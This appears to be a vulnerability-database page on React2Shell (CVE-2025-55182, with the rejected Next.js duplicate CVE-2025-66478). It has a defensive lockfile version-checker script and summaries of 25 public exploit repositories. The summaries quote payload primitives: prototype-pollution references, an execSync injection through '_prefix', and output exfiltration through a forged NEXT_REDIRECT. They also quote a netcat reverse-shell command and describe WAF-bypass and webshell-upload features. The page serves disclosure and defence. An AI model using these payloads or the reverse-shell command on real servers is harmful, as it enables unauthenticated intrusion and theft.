Rejected duplicate CVE for downstream Next.js exposure to React2Shell
CVE-2025-66478 was assigned to track the downstream impact in Next.js applications (App Router, Server Actions) of the React Server Components vulnerability known as React2Shell. It has since been rejected as a duplicate of CVE-2025-55182, the upstream React identifier, so CVE-2025-55182 is the canonical record and there is no separate Next.js root-cause flaw. The underlying issue is unsafe deserialization of React Server Components (Flight) payloads: an unauthenticated attacker can POST a crafted multipart request to a Server Action endpoint and execute arbitrary JavaScript, and through it OS commands, inside the Node.js server process. Fixes shipped in react-server-dom-webpack/parcel/turbopack 19.0.1, 19.1.2 and 19.2.1 and in Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 and 16.0.7. Scanners, tickets and detection rules should key on CVE-2025-55182; the rejected ID only appears as an alias in third-party tooling and write-ups.
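Because the rejected ID and the canonical one cover the same code, what matters operationally is whether the installed versions sit below the fixed releases (react-server-dom-* 19.0.1, 19.1.2, 19.2.1; Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, as published in the upstream advisories). The following is an added example, not code from Mallory or from any repository listed on this page: it parses a package-lock.json and flags affected `next` and `react-server-dom-*` entries, including the 14.3.0-canary.77+ edge case. The lockfile content is constructed for the example; the fixed-version table and the handling of minor lines not in that table are the assumptions it rests on.

```python
"""Added example (not from the page or any listed repository): classify installed
Next.js and react-server-dom-* versions against the React2Shell (CVE-2025-55182,
rejected duplicate CVE-2025-66478) fixed releases."""
import json
import re

# First fixed release on each affected line, per the upstream React / Next.js advisories.
FIXED_REACT = ("19.0.1", "19.1.2", "19.2.1")
FIXED_NEXT = ("15.0.5", "15.1.9", "15.2.6", "15.3.6", "15.4.8", "15.5.7", "16.0.7")
# The vulnerable deserializer lives in these packages; react/react-dom are only version-matched.
REACT_SERVER_PKGS = {"react-server-dom-webpack", "react-server-dom-parcel", "react-server-dom-turbopack"}

_VER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(v):
    """Sortable key (major, minor, patch, is_release, prerelease_parts).
    A prerelease such as 14.3.0-canary.77 sorts below the release with the same number."""
    m = _VER.match(v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    pre = tuple(int(p) if p.isdigit() else p for p in m.group(4).split(".")) if m.group(4) else ()
    return (major, minor, patch, 0 if pre else 1, pre)


def _fixed_by_line(versions):
    return {parse_version(f)[:2]: parse_version(f) for f in versions}


def react_server_affected(version):
    """react-server-dom-* 19.0.0 .. 19.2.0 inclusive are affected."""
    key = parse_version(version)
    fixed = _fixed_by_line(FIXED_REACT).get(key[:2])
    if fixed is None:
        return False  # 18.x has no 19-style Flight server path; lines after 19.2 ship fixed
    return key < fixed


def next_affected(version):
    """Next.js 15.x / 16.x below the fixed patch, plus 14.3.0-canary.77 and later 14.3.0 canaries."""
    key = parse_version(version)
    major, minor, patch, _, pre = key
    if major == 14:
        # No 14.x stable release is affected; only 14.3.0 canaries from canary.77 on.
        return ((minor, patch) == (3, 0) and len(pre) >= 2 and pre[0] == "canary"
                and isinstance(pre[1], int) and pre[1] >= 77)
    table = _fixed_by_line(FIXED_NEXT)
    fixed = table.get((major, minor))
    if fixed is not None:
        return key < fixed
    lines = [mn for (mj, mn) in table if mj == major]
    if not lines:
        return False  # not a 15.x / 16.x major
    # Assumption: a stable minor line newer than every fixed line on its major was cut after
    # the fix. Prereleases of newer lines are flagged so they get a manual look.
    return not (minor > max(lines) and not pre)


def scan_lockfile(lock_json):
    """Return {package: version} for affected entries in a package-lock.json (lockfileVersion 2/3)."""
    lock = json.loads(lock_json)
    findings = {}
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # root project entry
        name = path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version")
        if not version:
            continue
        if name == "next" and next_affected(version):
            findings[name] = version
        elif name in REACT_SERVER_PKGS and react_server_affected(version):
            findings[name] = version
    return findings


# Constructed sample lockfile (not taken from any real project).
SAMPLE_LOCK = json.dumps({
    "name": "storefront", "lockfileVersion": 3,
    "packages": {
        "": {"name": "storefront", "dependencies": {"next": "16.0.6"}},
        "node_modules/next": {"version": "16.0.6"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-dom": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
})

if __name__ == "__main__":
    print(scan_lockfile(SAMPLE_LOCK))  # {'next': '16.0.6', 'react-server-dom-webpack': '19.2.0'}
```

Run it against a real lockfile with `scan_lockfile(open("package-lock.json").read())`; an empty result means every tracked package is at or above its fixed release, while canary builds of newer lines are deliberately reported so they are checked by hand.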
Exploits
25 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (134 hidden).
This repository is a minimal two-file proof-of-concept for CVE-2025-66478. The README describes the issue as unsafe handling of React Server Components / Next.js payloads leading to unintended code execution in certain configurations. The only code file, exploit.py, does not directly implement the network exploit itself; instead, it acts as a wrapper around another local script, defaulting to `CVE-2025-66478.py`, which is expected to perform the actual exploitation. The wrapper launches that PoC as a subprocess, feeds it the target URL and a command over stdin, parses returned output using a regex looking for an `OUTPUT BELOW:` marker, and presents the result to the operator. Operationally, exploit.py provides an interactive pseudo-shell for remote command execution. It accepts a required target URL (`-u/--url`) and an optional PoC script path (`-p/--poc`). It maintains a client-side notion of the remote current working directory, initialized to `/`, and supports `cd` by issuing a test command that changes directory remotely and runs `pwd`. For all other input, it prepends `cd <cwd>` before the user command so subsequent commands execute relative to the tracked directory. This indicates the intended capability is arbitrary command execution on a vulnerable web application backend. No hardcoded remote URLs, IPs, domains, or HTTP paths are present in the provided code. The only fingerprintable values are local file references and the root directory `/`. Because the actual exploit transport and endpoint logic are delegated to the missing `CVE-2025-66478.py`, the repository as provided is incomplete but still clearly exploit-oriented rather than a detector. Its maturity is best classified as POC: it offers interactive RCE workflow, but the core exploit implementation is absent from the analyzed contents and payloading is limited to operator-supplied shell commands.
This repository is a small standalone Python exploit PoC for CVE-2025-55182, with README documentation, one executable script, and a minimal requests dependency. The main file, cve-2025-55182.py, is the sole code artifact and acts as the entry point. It is not part of a larger exploit framework. The exploit targets vulnerable React Server Components / Next.js Server Actions deployments over HTTP(S). It builds a crafted multipart/form-data POST body that abuses the RSC wire protocol using a poisoned object with __proto__ pollution, constructor.constructor access, and a malicious _prefix JavaScript expression. The injected JavaScript executes synchronously on the server, uses Node.js child_process.execSync to run arbitrary OS commands, Base64-encodes stdout, and throws a forged NEXT_REDIRECT error so the application returns the output inside the x-action-redirect header. The script then parses either x-action-redirect or Location for the ?a= parameter, URL-decodes it, and Base64-decodes it for display. Capabilities include single-command execution (-c) and an interactive pseudo-shell (--shell), though the shell is stateless and sends one HTTP request per command. The operator can also override the Host header for virtual-hosted targets, set request timeouts, and enable verbose output to inspect raw response headers. There is no reverse shell, persistence, or callback infrastructure; exfiltration is entirely in-band via the HTTP response headers. Repository structure is simple: README.md provides vulnerability background, affected versions, usage examples, and references; requirements.txt lists requests>=2.28.0; .gitignore excludes Python artifacts and lab files. Overall, this is an operational but lightweight exploit script intended to demonstrate pre-authenticated RCE against vulnerable Node.js-based Next.js/React Server Components applications.
This repository is a small standalone Python proof-of-concept exploit for CVE-2025-55182, with README references also tying the issue to Next.js as CVE-2025-66478. The repository contains three files: a single exploit script (CVE-2025-55182.py), a README with usage/examples, and an MIT license. The Python script is the sole code file and main entry point. The exploit sends a crafted HTTP POST request using the requests library to an operator-supplied URL. It sets custom headers including Host: localhost, Next-Action: x, and a fixed multipart/form-data boundary. The POST body embeds a malicious serialized structure designed to trigger unsafe server-side behavior in React Server Components processing. The key execution primitive is injected into the _prefix field as JavaScript: process.mainModule.require('child_process').execSync('<command>');, which attempts to execute an arbitrary shell command on the target Node.js server. Capabilities are straightforward but dangerous: remote arbitrary command execution against a vulnerable server-side React/Next.js deployment. The script accepts a target URL and optional command-line command parameter; if omitted, it defaults to 'id'. It prints the target, command, and HTTP status code, but does not implement output retrieval, session handling, or advanced exploitation logic. Because it includes a usable hardcoded RCE primitive and supports arbitrary operator-supplied commands, it is more than a detection script but still a relatively simple PoC/operational exploit. No exploit framework is used. There is no persistence, privilege escalation, or lateral movement logic in the repository. The README includes an example reverse-shell command using netcat (nc 10.0.2.4 4444 -e sh), indicating intended post-exploitation use, but the exploit itself only delivers command execution and leaves payload selection to the operator.
This repository is a real exploit project centered on exploit/react2shell.py, a standalone Python exploit for CVE-2025-55182 affecting React Server Components in vulnerable React/Next.js deployments. The repository also includes extensive markdown analysis, a deliberately vulnerable Next.js lab application, an auxiliary curl-based exploit script, and a restoration script for resetting the lab after destructive testing. The main exploit is not merely a detector: it builds a malicious multipart/form-data request that targets Next.js Server Action / React Flight deserialization. The payload abuses prototype pollution ("$1:__proto__:then") and constructor traversal ("$1:constructor:constructor") to reach the JavaScript Function constructor, then executes attacker-controlled JavaScript in the Node.js process. That JavaScript invokes child_process.execSync() to run arbitrary shell commands. Command output is exfiltrated by throwing a NEXT_REDIRECT error whose digest is converted by Next.js into the X-Action-Redirect response header, typically embedding output in a /login?a=... redirect value. Capabilities described and partially visible in the code/docs include: vulnerability checking with a benign echo command, arbitrary command execution, interactive shell mode, environment-variable theft using a temp file and line-by-line reads to bypass header-size limits, website defacement, deletion of project/dashboard content, and server shutdown/DoS actions. This makes the exploit operational rather than a simple PoC. Repository structure: - exploit/react2shell.py: primary exploit implementation in Python using requests and argparse. - exploit/exploit-explanation.md: usage and architecture documentation. - docs/analysis/*.md: root-cause analysis, payload anatomy, and disclosure timeline. - vulnerable-app/: intentionally vulnerable Next.js 15.0.0 + React 19.0.0 demo target. - vulnerable-app/curl_id.sh: bash/curl variant of the exploit. - vulnerable-app/scripts/restore.sh: lab restoration helper. Fingerprintable observables include the target root path /, local demo URL http://localhost:3000, required headers Next-Action / X-Nextjs-Request-Id / X-Nextjs-Html-Request-Id, response header X-Action-Redirect, exfiltration redirect path /login?a=${res}, and temp file /tmp/stolen_env.txt. The vulnerable app itself exposes a server action in vulnerable-app/app/actions.ts and a client page in app/page.tsx, but the vulnerability is in the underlying React/Next.js deserialization path rather than in custom application logic.
Repository purpose: an educational proof-of-concept Next.js application branded as an “interactive code playground” that exposes a server-side code execution API and is presented as demonstrating CVE-2025-55182 / CVE-2025-66478. It does not exercise the RSC/Flight deserialization path those CVEs cover: it uses the Pages Router with React 18.2.0, outside the affected 19.0.0 to 19.2.0 range, and its code execution comes from an API route that deliberately calls eval() on request input. Structure (6 files): - Dockerfile: builds a Node 20 Alpine container, installs dependencies, runs `next dev`, exposes port 3000. - package.json: pins `next` to 15.0.0 (described as vulnerable) with React 18.2.0. - pages/api/rce.js: core "vulnerable" component. Implements a Next.js API route that accepts POST JSON `{ code: string }` and executes it using `eval()` or `new Function()` depending on simple heuristics. Returns JSON with `success`, `result`, `resultType`, timestamp, and code length; returns eval errors as `success:false`. - pages/index.js: large frontend UI that calls `fetch('/api/rce')` to submit code and renders the returned JSON/error to the page. - README.md / LICENSE: documentation, disclaimers, Docker run instructions, and patch guidance. Exploit capability: network-accessible RCE via the `/api/rce` endpoint. Any remote user who can reach the service can submit arbitrary JavaScript for execution in the server’s Node.js context. CORS is set to `*`, enabling cross-origin browser-based triggering as well. No authentication, sandboxing, or allowlist is present, so the endpoint provides arbitrary code execution and can be extended to filesystem/network actions through Node APIs. A detection or exploit written for the real CVE will not fire against this lab, and a hit against `/api/rce` says nothing about React2Shell exposure.
This repository is a containerized CTF lab demonstrating React2Shell (CVE-2025-55182) / downstream Next.js issue (CVE-2025-66478): unsafe deserialization in the React Server Components (Flight) protocol used by Next.js Server Actions. Repository structure/purpose: - Dockerized vulnerable Next.js App Router storefront ("Quantum Supplies") under /app, pinned to next@16.0.6 and react/react-dom@19.2.0. The Dockerfile creates a readable flag at /flag/flag.txt and runs the app on port 3000 (exposed as localhost:10001 via docker-compose). - Vulnerable surface is not custom business logic; it is the framework’s parsing of Server Action multipart Flight payloads. The app includes typical server actions (register/login/addToCart/removeFromCart/checkout/removeOrder) in app/actions/serverActions.js; the checkout action is highlighted as the intended trigger point. - /documents and /solution contain extensive writeups explaining the Flight payload structure, prototype/property injection primitives (e.g., $1:__proto__:then and $1:constructor:constructor), and how to exfiltrate command output using a crafted NEXT_REDIRECT digest. - solution/solve.py is the operational exploit driver: it runs curl to POST a crafted multipart/form-data body with a Next-Action header to http://localhost:10001/login (any Server Action-routed endpoint works in the lab), injecting JavaScript into the deserialization context via _response._prefix. The injected code executes OS commands through Node’s child_process.execSync (specifically `cat /flag/flag.txt`) and forces Next.js to return the output by throwing a NEXT_REDIRECT error that embeds the result in /login?a=... . Exploit capabilities: - Network-based pre-auth RCE (as described in the docs) by sending a malicious React Flight multipart payload to a Server Actions endpoint. - Arbitrary command execution in the Node.js runtime (execSync), demonstrated by reading a local file (/flag/flag.txt) and returning it to the attacker. - Output exfiltration via Next.js redirect/digest behavior rather than needing an out-of-band channel. Notable implementation details: - next.config.mjs sets experimental.serverActions.allowedOrigins to ["*"], which is permissive and relevant to cross-origin invocation scenarios, though the core issue is the deserializer vulnerability. - The Next-Action header value is build-specific; the solution docs note it changes after rebuilds, requiring re-capture from a legitimate request.
Repository implements a Firefox (Manifest v3-style) extension named "RSC Sentinel" aimed at detecting and optionally probing/exploiting "React2Shell"-style issues in React Server Components / Next.js App Router applications (README cites CVE-2025-55182 and CVE-2025-66478). Structure & roles: - manifest.json: Declares permissions (activeTab, scripting, declarativeNetRequest) and host_permissions <all_urls>, loads content.js on all pages at document_idle, and enables rules.json. - content.js (core): Performs (1) passive scanning for RSC/App Router indicators, (2) active fingerprint probing (user-initiated), (3) WAF detection via header/body signature heuristics (Cloudflare, AWS, Akamai, Fastly, Imperva, Sucuri, F5, Barracuda, Vercel, Azure, Google Cloud Armor), and (4) a user-driven exploit routine that sends a crafted request containing a command and attempts to extract a "digest" field from the response, base64-decodes it, and returns the decoded output to the popup. - popup.html + popup.js: UI to display passive signals, run the fingerprint probe, and submit a command (default "whoami") for execution; also supports a WAF-bypass toggle and shows the detected WAF vendor. - background.js: Sets a red "!" badge when detection/exploit success is reported. - rules.json: Modifies outbound XHR headers globally (sets a fixed Referer and removes Origin), which can affect server-side CSRF/origin checks and may help with certain bypass scenarios. Capabilities (actionable): - Passive detection: highlights likely RSC/Next.js App Router presence without changing site behavior. - Active probing: sends a controlled fingerprint request to elicit RSC-specific responses. - Manual command execution: sends a user-provided command to the current site and displays returned output if the target responds with an expected "digest" value; includes optional WAF-bypass behavior and WAF fingerprinting. No hardcoded external C2 infrastructure is present; network activity is directed at the currently visited site (all URLs) and relies on the target application’s endpoints/behavior.
Repository contains a minimal Python proof-of-exploit for a “React2shell” chain referencing CVE-2025-55182 + CVE-2025-66478. Structure: - README.md: one-line description of the CVE chain. - exploit.py: standalone Python script (requests-based) that performs a single HTTP POST to a target base URL. Exploit behavior/capabilities: - Takes `BASE_URL` from argv[1] (default `http://localhost:3000`) and a command from argv[2] (default `calc`). - Crafts a multipart/form-data body with two parts (`files` keys "0" and "1"). Part "0" is JSON containing a specially shaped object (`crafted_chunk`) that includes: - Prototype/thenable manipulation fields (e.g., `"then": "$1:__proto__:then"`, `"value": '{"then": "$B0"}'`) consistent with a deserialization/prototype-pollution style gadget. - An `_response._prefix` string that is intended to be evaluated in a Node/Next.js server context; it calls `child_process.execSync(<command>, timeout=5000)`. - A follow-on technique to surface command output by throwing an Error('NEXT_REDIRECT') with a `digest` property containing the command output. - Sends the request with header `Next-Action: x` to force Next.js server-action handling. - Prints HTTP status code and response text, which may include the embedded command output if exploitation succeeds. No additional infrastructure (C2, callbacks, hardcoded external IPs/domains) is present; the only network interaction is the single POST to the provided base URL.
Repository purpose: an intentionally vulnerable Next.js/React Server Components lab environment for testing detection/exploitation of the React2Shell RCE (CVE-2025-55182) and downstream Next.js impact (CVE-2025-66478). Key capabilities: - Provides a runnable vulnerable web app (Next.js App Router) pinned to next@16.0.6 and react/react-dom@19.2.0. - Includes a Nuclei template (nuclei-template/CVE-2025-55182.yaml) that performs an unauthenticated RCE check by sending a crafted multipart/form-data POST to "/" with Next.js RSC/Server Action headers. The payload executes a command (Linux: echo arithmetic; Windows: PowerShell arithmetic) via Node.js child_process.execSync and verifies exploitation by matching the resulting redirect header (x-action-redirect to /login?a=<result>). - README documents a manual PoC payload that executes `id` and returns output in the response digest. Repository structure: - app/layout.jsx, app/page.jsx: minimal Next.js UI explaining the vulnerable components and references. - package.json / next.config.mjs: pins vulnerable dependencies and minimal config. - Dockerfile: builds and runs the app on port 3000 (dev mode) inside a Node 20 container. - nuclei-template/CVE-2025-55182.yaml: primary exploit/detection artifact (Nuclei). - docker.sh and install-docker.sh: helper scripts to install Docker/Docker Compose on Ubuntu (environment setup, not part of exploitation). Overall: this is primarily a PoC/vulnerable testbed plus a scanner template, not a full weaponized exploit framework; it demonstrates pre-auth network RCE via unsafe deserialization in the RSC/Server Action request handling path.
This repository contains a Go-based proof-of-concept exploit and scanner for two Next.js server-side RCE vulnerabilities (CVE-2025-55182 and CVE-2025-66478). The main file, react2shell.go, implements a high-concurrency scanner that can target a single domain or a list of domains, optionally using Subfinder to enumerate subdomains. The exploit crafts a multipart/form-data POST request with a JavaScript payload that leverages a backtick-encoded command injection to trigger code execution on the server. The tool checks for successful exploitation by inspecting the 'X-Action-Redirect' header in the HTTP response for the expected command output. The repository is structured with a single Go source file and a README, and is intended for security testing and research purposes.
This repository contains a Python-based exploit toolkit ('React2Shell') targeting a critical remote code execution (RCE) vulnerability (CVE-2025-66478) in Next.js applications using React Server Components (RSC). The exploit leverages prototype pollution and a React.lazy(-1) gadget chain to achieve arbitrary command execution via Node.js's child_process.execSync. The toolkit automates detection of vulnerable targets, exploitation, and post-exploitation activities such as interactive shell access, file upload (including PHP webshells), and file read. It includes advanced features for bypassing web application firewalls (WAFs) using junk data, Unicode encoding, and header manipulation. The main entry point is 'main.py', which provides a command-line interface for scanning, exploitation, and shell interaction. The toolkit exfiltrates command output via HTTP redirects to endpoints like '/exploit?out=<output>'. The README files provide detailed usage instructions, supported commands, and post-exploitation techniques. The exploit is operational, providing a working payload and interactive shell, and is intended for authorized penetration testing of Next.js applications vulnerable to this specific RSC attack chain.
This repository provides a professional Python-based scanner and exploitation tool for CVE-2025-66478, a critical RCE vulnerability in Next.js applications using React Server Components. The main script, 'react2shell-ultimate.py', implements multiple scanning modes: safe detection, RCE proof-of-concept, version detection, and comprehensive scanning with WAF bypass techniques. It supports batch scanning, JSON output, and advanced exploitation features such as 'God Mode', which allows interactive shell access and file reading on vulnerable targets. The tool is operational and can be used for both detection and exploitation, not just as a POC. The 'menu.py' script provides an interactive menu interface for automating scans and managing results. The README documents usage, features, and legal disclaimers, and points to a professional web interface and API. The tool targets Next.js (primarily versions 15.x and 16.x before patching) and is intended for authorized security testing. No hardcoded IPs or domains are used for exploitation; the user supplies the target URL. The codebase is clean, modular, and leverages standard Python libraries and requests/tqdm for HTTP and progress handling.
This repository provides a full proof-of-concept (PoC) and operational exploit for CVE-2025-55182 (and CVE-2025-66478), a critical remote code execution (RCE) vulnerability affecting Next.js (15.x, 16.x App Router), React Core (19.0.0 to 19.2.0), and react-server-dom-webpack (19.0.0 to 19.2.0) running on Node.js >=20.9.0. The repository is structured into two main components: 1. 'cve-2025-55182-target/' is a sample vulnerable Next.js application, configured with the affected versions, for local testing and demonstration purposes. 2. 'react2shell/' contains the actual exploit tools: - 'scanner.py' is a high-fidelity scanner for detecting the vulnerability, supporting both single and multi-target scanning, custom headers, safe (non-RCE) detection, WAF bypass, and Windows payloads. - 'scanner_with_rce.py' extends the scanner to perform actual remote code execution, allowing arbitrary commands to be run on the target server. Both scripts are written in Python and use multipart/form-data POST requests with a crafted payload that exploits the RSC deserialization flaw, resulting in command execution via Node.js child_process. - 'assets/poc.http' provides a raw HTTP request example for manual testing. The exploit works by sending a specially crafted POST request to the root (or redirected) path of the target Next.js application. If successful, the output of the executed command is returned in the X-Action-Redirect response header. The exploit scripts support various operational modes, including safe detection, WAF bypass, and Windows compatibility. The repository is not part of a framework and is a standalone PoC/exploit. The main attack vector is network-based, targeting HTTP(S) endpoints exposed by vulnerable Next.js servers.
This repository is a comprehensive exploitation toolkit for CVE-2025-55182 and CVE-2025-66478, critical unauthenticated RCE vulnerabilities in React Server Components and Next.js. The toolkit includes: - A Nuclei template (cve-2025-55182.yaml) for automated detection and exploitation, sending crafted POST requests to '/' and '/_next/data' endpoints to trigger unsafe deserialization and prototype pollution, resulting in remote code execution. The template uses mathematical validation to confirm successful exploitation. - A Bash script (scanner_advanced (1).sh) providing an interactive CLI for scanning and exploiting single or multiple targets, supporting custom commands and output options. - A Python script (shodan_scanner_advanced (1).py) for discovering potentially vulnerable targets via Shodan, supporting batch scanning and JSON reporting. - A requirements file for Python dependencies. - A detailed README describing the vulnerabilities, affected versions, usage instructions, and references. The main attack vector is network-based, targeting HTTP(S) endpoints exposed by vulnerable React or Next.js servers. The exploit does not require authentication and can result in full system compromise. The toolkit is operational, providing both detection and exploitation capabilities, and is suitable for red team and authorized security testing.
This repository provides a proof-of-concept (PoC) and testing lab for CVE-2025-55182 (React Server Components RCE) and the related Next.js downstream CVE-2025-66478. The main exploit is implemented as a Nuclei template (nuclei-template/CVE-2025-55182.yaml), which sends a crafted HTTP POST request to the root endpoint (/) of a vulnerable Next.js/React RSC application. The payload leverages unsafe deserialization in the RSC 'Flight' protocol, resulting in unauthenticated remote code execution via Node.js child_process. The exploit demonstrates successful code execution by redirecting the user to /login?a=<result>, where <result> is the output of a system command (multiplication of two random numbers). The repository also includes a Dockerfile and Next.js application code to set up a vulnerable environment for testing. The PoC is operational and suitable for both detection and exploitation in a controlled lab. No hardcoded IPs or external domains are present; all exploitation is performed via HTTP requests to the local or target server.
This repository is a Go-based GUI tool for exploiting remote code execution (RCE) vulnerabilities in Next.js applications, specifically targeting CVE-2025-55182 and CVE-2025-66478. The tool provides a user-friendly interface (built with the Fyne GUI library) that allows users to specify a target URL and endpoint, configure payload encoding/encryption options, and execute arbitrary system commands or JavaScript code on the target server. It supports advanced features such as file management (read/write), module loading, and various payload obfuscation techniques (Unicode, UTF-16LE, AES encryption) to bypass WAFs. The main logic resides in 'pkg/core/exploit.go', which crafts and sends multipart/form-data POST requests with malicious payloads to the target endpoint. The GUI in 'pkg/gui/window.go' orchestrates user input and displays results. The tool is operational and provides real exploitation capabilities, not just detection. No hardcoded IPs or domains are present; the user supplies the target. The tool is cross-platform and can be used on Windows, macOS, or Linux.
This repository contains a proof-of-concept (PoC) exploit for CVE-2025-66478 (also referenced as CVE-2025-55182), a critical remote code execution (RCE) vulnerability in Next.js applications using React Server Components (RSC). The exploit leverages prototype pollution via a crafted multipart/form-data POST request to inject a malicious payload into the server's RSC serialization process. This results in arbitrary command execution on the server using Node.js's child_process.execSync. The main exploit script (CVE-2025-66478.py) is an interactive Python CLI that prompts the user for a target URL and a command to execute. It constructs the malicious payload, sends it to the specified endpoint, and parses the response to display the command output. The repository is structured with a single Python exploit script and a detailed README.md explaining the vulnerability, usage instructions, and example output. No hardcoded endpoints are present; the target URL is supplied by the user at runtime. The exploit is a functional PoC and does not include weaponization or automation for mass exploitation.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-55182 and CVE-2025-66478, which are critical unauthenticated remote code execution (RCE) vulnerabilities in Next.js (versions 15.x, 16.x, and 14.3.0-canary.77+) when used with vulnerable versions of React (19.0.0, 19.1.0, 19.1.1, 19.2.0). The exploit leverages prototype pollution and the React Flight Protocol's deserialization process to achieve arbitrary code execution on the server. The main exploit is implemented in 'poc.py', a Python script that sends a specially crafted multipart POST request to the target Next.js server. The payload abuses the server's deserialization logic to execute arbitrary shell commands, with the command output returned in the HTTP response. The repository also includes a minimal vulnerable Next.js application (app/layout.js, app/page.js, package.json) for local testing. The exploit does not require authentication and can be used to run any command, including spawning a reverse shell. The repository is structured as a PoC for security researchers and red teamers to demonstrate the impact of the vulnerability.
This repository provides a comprehensive exploit and scanning toolkit for CVE-2025-55182 and CVE-2025-66478, which are critical unauthenticated remote code execution (RCE) vulnerabilities in React Server Components (RSC) and Next.js. The exploit leverages prototype pollution and unsafe deserialization in the React Flight protocol, allowing attackers to execute arbitrary JavaScript on the server, which is then used to run system commands via Node.js's child_process module. The repository includes: - High-fidelity scanner scripts (react2shell-scanner, cve-2025-66478-web-scan) for detection and mass scanning, supporting safe detection and full RCE verification. - A weaponized exploit script (test-lab/exploit.py) capable of executing arbitrary commands or establishing a reverse shell on vulnerable targets. - IOC databases (payloads-exploits/*.csv) with known malicious IPs, C2s, and exfiltration endpoints observed in the wild. - A Docker-based test lab with both vulnerable and patched Next.js applications for safe local testing. - Multiple payload examples, including those for exfiltration and malware delivery, with endpoints for C2 and data theft. The exploit is operational and can be used for both detection and full exploitation, including file read, command execution, and reverse shell. The attack vector is network-based, requiring only HTTP(S) access to the target. The toolkit is suitable for red team operations, vulnerability research, and blue team detection rule development. The repository is well-documented, with guides for setup, usage, and integration with security platforms.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-66478, a critical remote code execution (RCE) vulnerability in Next.js (App Router) due to insecure deserialization and prototype pollution in the React Server Components (RSC) Flight protocol. The repository contains a minimal vulnerable Next.js application (in the 'app' directory) and a Node.js exploit script ('exploit.mjs'). The exploit script connects to a target Next.js server, discovers a required action ID, and sends a specially crafted multipart/form-data POST request whose Flight payload gives an attacker-controlled object a 'then' property resolved through a `__proto__` reference (the same prototype-pollution primitive seen in the other entries). The server therefore treats that object as a thenable, which leads to the execution of arbitrary JavaScript code (including system commands via child_process.execSync) on the server. The exploit provides an interactive shell for executing arbitrary commands remotely. The default endpoint is 'http://localhost:3000', but this can be changed. The repository is well-documented, with both English and Chinese readmes, and is intended for research and educational purposes only.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-55182, a remote code execution (RCE) vulnerability in React Server Components and Next.js applications. The main exploit script, 'react2shell-scanner.py', is a Python 3 tool that allows a user to specify a target URL and (optionally) multiple paths to probe for the vulnerability. The tool sends specially crafted HTTP POST requests with multipart/form-data payloads to exploit the vulnerability, allowing arbitrary OS command execution on the target server. It supports several features, including WAF bypass techniques (junk multipart fields, Vercel-specific tweaks), safe check mode (for detection without exploitation), custom headers, TLS options, and JSON output. The tool is single-host focused and intentionally disables mass scanning features. The README provides detailed usage instructions, examples, and legal disclaimers. The repository is structured with a single main exploit script, a requirements file for dependencies, and documentation. No hardcoded IPs or domains are used for exploitation, but example and default endpoints are provided. The exploit is intended for educational and authorized testing only.
This repository contains an advanced exploit and scanner for two critical vulnerabilities (CVE-2025-55182 and CVE-2025-66478) affecting Next.js applications using React Server Components (RSC). The main exploit logic is implemented in 'react2shell.py', a Python script that can scan single or multiple targets for RCE vulnerabilities and, if found, exploit them by executing arbitrary commands on the server. The tool supports both Linux and Windows targets, with payloads crafted for each OS. It features WAF bypass techniques, multi-threaded scanning, and both detection and exploitation modes. The README provides detailed usage instructions, including command-line options for specifying targets, commands, output files, and operational modes. The only endpoints directly referenced are user-supplied target URLs (via command-line or file input). The repository is operational-grade and suitable for both vulnerability assessment and exploitation in authorized security testing contexts.
This repository contains 'next88', a high-performance Go-based scanner and exploit tool targeting React Server Components RCE vulnerabilities (CVE-2025-55182 and CVE-2025-66478) in Next.js applications. The main logic resides in 'main.go', which implements concurrent scanning of single or multiple hosts, supports various payloads for both Unix and Windows targets, and includes advanced WAF bypass techniques (junk data, double encoding, semicolon insertion, and Vercel-specific payloads). The tool can perform both safe (side-channel) and direct RCE PoC checks, detect source code exposure via ACTION_ID extraction, and output results in JSON format. It also supports real-time notifications via Discord webhooks. The README provides comprehensive usage instructions, including command-line options for custom paths, output formats, and integration with the AutoAR project. The Makefile and setup documentation facilitate easy building and integration. The tool is operational and suitable for both vulnerability detection and exploitation in real-world scenarios.
This repository, 'react2shell', is a Rust-based CLI tool designed to exploit critical prototype pollution vulnerabilities (CVE-2025-55182, CVE-2025-66478) in React Server Components and Next.js Server Actions. The exploit targets specific versions of Next.js (15.x, 16.x, 14.3.0-canary.77+) and React (19.x) packages, enabling remote code execution (RCE) on affected servers. The tool provides two main functionalities: (1) opening an interactive shell to execute arbitrary commands or JavaScript on a single target, and (2) scanning multiple targets for vulnerability, logging successful exploits to a results file. The exploit works by sending a specially crafted JSON payload via a multipart POST request to the target, abusing prototype pollution to inject code that is executed server-side using Node.js 'child_process'. The repository is structured with Rust source code in the 'src/' directory, a sample vulnerable Next.js app in 'lab/', and supporting configuration files. The main entry point is 'src/main.rs', which parses CLI arguments and dispatches to either exploit or scan mode. The exploit logic is implemented in 'src/exploit.rs', and interactive shell features are in 'src/prompt.rs'. No hardcoded IPs or domains are present; the tool is designed to be used against user-specified targets. The attack vector is network-based, requiring HTTP(S) access to the vulnerable server. The payload is operational, providing a working shell and command execution capabilities, but is not part of a larger exploitation framework. The repository includes clear documentation, legal disclaimers, and mitigation advice.
